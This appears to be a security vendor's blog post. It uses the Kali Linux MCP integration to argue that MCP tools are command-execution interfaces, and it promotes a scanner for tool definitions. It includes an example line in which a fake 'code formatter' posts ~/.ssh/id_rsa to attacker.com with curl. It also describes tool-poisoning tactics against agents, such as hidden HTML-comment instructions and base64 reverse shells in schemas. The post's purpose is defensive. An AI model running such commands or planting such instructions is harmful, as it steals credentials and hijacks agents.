On February 25, 2026, the Kali Linux team published an official blog post showing how to connect Claude Desktop to a Kali instance via MCP. The setup gives an AI agent direct access to nmap, metasploit, hydra, sqlmap, gobuster, nikto, and john the ripper — all controlled through natural language.
This is not a proof of concept from a security researcher. This is the official Kali Linux distribution documenting how to turn an AI agent into a pentesting operator.
And it changes the threat model for every MCP server in the ecosystem.
What the Kali team built
The architecture connects three systems: macOS running Claude Desktop as the user interface, a Kali Linux instance as the attack platform, and Anthropic’s Sonnet LLM as the reasoning layer. The glue is MCP.
A user types port scan scanme.nmap.org in Claude Desktop. The LLM determines which tools are needed, queries the MCP server running on Kali for tool availability, executes nmap -sV remotely, and presents the results in human-readable format. No terminal. No manual command construction. Natural language in, scan results out.
The MCP server (mcp-kali-server) exposes the following tools:
- Network reconnaissance: nmap, enum4linux-ng
- Web scanning: gobuster, dirb, nikto, wpscan
- Password attacks: hydra, john
- Exploitation: metasploit-framework
- Database testing: sqlmap
Each tool is exposed as an MCP tool definition. The agent sees the tool name, description, and parameter schema, then decides when and how to invoke each one based on the user’s request.
Why this matters for MCP security
The Kali integration is a legitimate, well-documented use case. But it demonstrates something the security community should pay attention to: MCP tools have real system-level impact.
When we talk about MCP tool poisoning, the typical example is a tool that exfiltrates data or injects instructions. Those are real threats. But the Kali setup shows something more direct: MCP tools can execute arbitrary commands on remote systems, run network scans, launch password attacks, and interact with exploitation frameworks.
If a legitimate MCP server can give an AI agent access to metasploit, imagine what a malicious MCP server can do when an agent installs it without inspection.
The attack surface is the tool definition
An MCP server is defined by its tool schemas. The agent reads the tool name, description, and parameters, then decides how to use them. A malicious MCP server does not need to exploit a vulnerability. It just needs to present tools that an agent will use.
Consider these scenarios:
- A “code formatter” tool that actually runs
curl -X POST https://attacker.com -d $(cat ~/.ssh/id_rsa)as a side effect. The tool name and description say “format code.” The implementation exfiltrates credentials. - A “deployment helper” tool that installs a reverse shell alongside the deployment scripts. The agent sees a legitimate deployment tool. The MCP server adds a persistent backdoor.
- A “database migration” tool that dumps the database to an external endpoint before running the migration. The tool works as described. It also ships your data.
The Kali setup is honest about what it does. Malicious MCP servers are not. And agents cannot tell the difference by reading tool descriptions alone.
What Aguara detects in MCP tool definitions
Aguara’s 148 detection rules are designed for exactly this attack surface. When you scan an MCP server configuration or tool definition, the scanner checks for:
| Category | What it catches | Rules |
|---|---|---|
| Command Injection | Shell commands, backtick execution, eval patterns | 12 rules |
| Credential Exposure | API keys, tokens, passwords in configs and schemas | 18 rules |
| Data Exfiltration | Outbound HTTP requests, webhook patterns, encoded payloads | 9 rules |
| Tool Poisoning | Hidden instructions in descriptions, parameter injection | 15 rules |
| Evasion Techniques | Base64 encoding, hex obfuscation, unicode tricks | 10 rules |
| Supply Chain | npx -y, chained downloads, postinstall scripts | 8 rules |
The Kali MCP server would trigger several of these rules legitimately — it contains shell command patterns, network scanning tools, and exploitation frameworks. That is expected for a pentesting toolkit. The value of scanning is being able to distinguish between a legitimate security tool and a malicious one masquerading as something benign.
The pattern: legitimate tools as templates for attacks
What Kali built is a blueprint. And attack patterns follow blueprints.
In Aguara Watch, we scan 42,655 skills across 7 MCP registries. Patterns we have already found in production registries:
- Base64-encoded reverse shells inside tool parameter schemas. Not in the README. Inside the JSON definition the agent parses.
- Hidden instructions via HTML comments embedded in skill descriptions. Invisible when rendered, visible to the LLM.
- Credential templates in configuration schemas with
OPENAI_API_KEY=sk-your-key-hereas default values. - Chained downloads in install scripts that pull additional code from external URLs.
The Kali integration normalizes agents executing system commands through MCP. Once that pattern is normalized, the difference between “nmap via a pentesting MCP server” and “nmap via a disguised MCP server” is only the label.
What to do about it
The answer is not to avoid MCP. The protocol is useful. The answer is to scan before you trust.
1. Scan your MCP configurations
# Auto-discover and scan all MCP configs on your machine
aguara scan --auto
# Scan a specific MCP config file
aguara scan ~/.config/claude/claude_desktop_config.jsonAguara’s auto-discovery finds MCP configurations for 17 clients: Claude Desktop, Cursor, VS Code, Windsurf, Cline, Zed, and more. It scans every server definition, tool schema, and startup command for security issues.
2. Let your agent scan before installing
# Install the MCP server for agent-level scanning
go install github.com/garagon/aguara-mcp@latest
claude mcp add aguara -- aguara-mcpThe Aguara MCP server gives your agent a scan_content tool. Before the agent installs a new MCP server, it can scan the tool definitions against 148 rules validated against 42,655 real skills. The scan takes milliseconds.
3. Check the observatory
Before installing any MCP server from a public registry, check its security profile on Aguara Watch. Every skill has an A-F grade, a finding breakdown, and a severity summary. 42,655 skills across 7 registries, scanned 4 times daily.
The real lesson from the Kali integration
The Kali team did nothing wrong. They built a legitimate tool and documented it well. The setup requires explicit SSH key configuration, deliberate server installation, and intentional use.
But they proved a point that the MCP ecosystem needs to internalize: MCP tools are not API wrappers. They are command execution interfaces. An agent with access to an MCP server can run nmap, can run metasploit, can run hydra. The protocol makes no distinction between a database query and a network scan.
Every MCP server an agent connects to is a trust decision. Static analysis before installation is how you make that decision informed instead of blind.
Scan your MCP configs now
Discover every MCP server configured on your machine. Find hidden security issues before your agent does.